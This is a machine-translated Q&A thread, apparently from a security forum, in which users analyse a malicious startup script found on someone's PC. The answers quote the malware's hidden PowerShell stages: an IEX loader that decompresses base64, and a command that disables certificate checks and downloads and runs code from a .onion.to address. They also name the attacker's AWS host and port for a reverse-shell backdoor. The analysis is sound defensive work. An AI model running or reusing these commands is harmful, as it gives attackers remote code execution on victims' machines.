prpops.com (NSFW)
的间谍软件已安装在我的系统上,而没有任何通知。这是运行上面的bat文件所用的一些代码。记忆?#1 楼
简短版本攻击者可以在您的计算机上运行任何PowerShell命令,可以通过获取“ ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com”的所有者来查找。
长版本
我将二进制数组转储到文件中并上传到VirusTotal。
新启动的文件对我来说似乎是一个额外的阶段,因为它很小(1.7 kb),并且仅会执行10秒钟,因为它将绑定到PowerShell(因为攻击者创建线程而不是将其作为单独的进程启动),并且在最后一条命令时终止延迟10秒钟。
更新:我很遗憾,我无法对装配进行逆向工程,但是使用文本编辑器快速浏览了该文件,发现以下字符串:但仍然可以转储至:
powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(
'A really long base64 full code can be found below'));
IEX (New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();)
这是一个相当简单的PowerShell后门,它正在连接到服务器,然后允许在跟踪以在计算机上远程运行PowerShell命令。可以通过在google上搜索两秒钟来在GitHub上找到此“ powerfun”脚本,因此在这里我不会链接该脚本以扩展反垃圾邮件限制。但是,通过将其与原始脚本进行比较,您会很快注意到攻击者将远程服务器地址更改为“ ec2-54-169-248-105.ap-southeast-1.compute.amazonaws.com”和端口到9999,因此如果需要,可以轻松地跟踪攻击者。
最后:服务器仍在侦听该端口,因此攻击者可以控制您的计算机!
评论
我没有在答案中提到它,但是您可以连接到后门代码中指定的IP和端口。由于9999是一个非常不寻常的端口,因此我认为它仍然是攻击者在侦听目标。
–VinBreaker
17年5月25日在21:34
我们能否以某种方式向亚马逊AWS团队报告此情况,以滥用其服务?
–猫
17年5月25日在23:39
@Aditya Giri这取决于病毒的持久性,它可能只是自动启动脚本,也可能不是,仅可能是自动启动脚本,也可能是下载的可执行文件,我对此深表怀疑,因为它保存在RAM中而不是保存在硬盘中,我不知道可执行文件实际上是做什么的,它也有可能自动启动。在另一种情况下,只需从自动启动和重新启动中删除第一阶段就可以了。 :)
–VinBreaker
17年5月26日9:00
@cat aws.amazon.com/forms/report-abuse
–脑袋
17年5月27日在13:46
因此,我编写了一个简单的Node.js脚本来连接和回显提供给它的任何命令。你可以在这里找到它。我一直在听,到目前为止还没有发出命令。看起来像是通过AWS真正便宜的僵尸网络。他们应该对此进行调查。
– Qix-蒙尼卡(MS)被盗
17年5月28日在3:23
#2 楼
简短版本您的计算机已受到攻击,攻击者仍然控制着您的计算机。
长期版本
通过解码base64编码的表达式(在
-Enc
参数中传递的字符串),您可以获得由PowerShell执行:[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
iex (New-Object Net.WebClient).DownloadString("https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq")
该代码基本上从Tor隐藏服务中下载一些PowerShell代码(通过
onion.to
网关,该网关允许从未连接到Tor的计算机上访问Tor隐藏服务。 )并执行它。这是下载并执行的代码(再次,内联执行base64编码的PowerShell脚本):
powershell -Enc [long base64 encoded string]
据我了解,此代码导入系统DLL,然后执行一些本机代码(第8行上的长字节数组)。字节数组并将其提交给VirusTotal,以尝试确定它是恶意软件还是可怕的恶意软件ctly在沙箱中运行PowerShell脚本以动态分析其行为。
评论
能否请您检查编辑?
– Aditya Giri
17年5月27日在8:55
#3 楼
它正在运行带有Base64编码的Powershell代码的Powershell脚本。这是正在运行的已解码Powershell代码:脚本正在从
https://lc25qj2gdcaidarc.onion.to:443/LeTrWHzIq
下载和调用内容我警告您导航到一个潜在的恶意链接,我将让您进一步挖掘。尤其是因为它来自* .onion.to,是TOR地址。
评论
基于此,几乎可以肯定这是不好的。该网站已消失,但它的声音已感染了某些东西!
–罗恩·鲍斯(Ron Bowes)
17年5月25日在17:19
当我尝试解码Base64时,每个ASCII字符之间都有一个NUL(00000000二进制)吗?为什么是这样?我做错什么了吗?
–阿兹台克
17年5月25日在18:31
@Azteca它采用Unicode(UTF-8),而不是您的编辑器。
– GalacticCowboy
17年5月25日在20:08
@GalacticCowboy我使用了Chrome控制台atob('QmFzZTY0IHRleHQgaGVyZQ =='),rapidtables.com和base64decode.org,它们在每个ASCII字母之间都显示了一些内容,好像是UTF16?或只是PS跳过了空值(0x00-bin 00000000)
–阿兹台克
17年5月25日在20:19
@Azteca我的假设是,实际上,它是UTF-16,除非您有某种理由认为不是。
– Tanner Swett
17年5月25日在22:41
评论
该启动脚本正在从当前不可用的洋葱(Tor网络)站点下载(潜在)恶意软件。如果答案是正确的,则可以从远程服务器在您的计算机上运行任意且未知的PowerShell脚本,此时很容易假定几乎所有内容都可以运行,包括其他可执行的admin / privilege升级漏洞。对于我来说,听起来像是来自轨道情况的核弹,更改密码等。在这一点上,我认为甚至无法知道下载并运行了什么,因为该站点已经消失了。我认为没有人能猜出还可以执行其他哪种操作。
只是好奇,但是您如何发现它在启动时正在运行?
我想看看哪些应用程序在启动时如此快地消耗了我的电池。我看到了一个名为config的程序。我深入研究代码以查看发生了什么。我得到了存在的file.bat。我以为这是恶意行为,最终在这里得到社区的好评。
等待!您格式化了PC,但它仍然在那里??您从哪里获得安装介质的?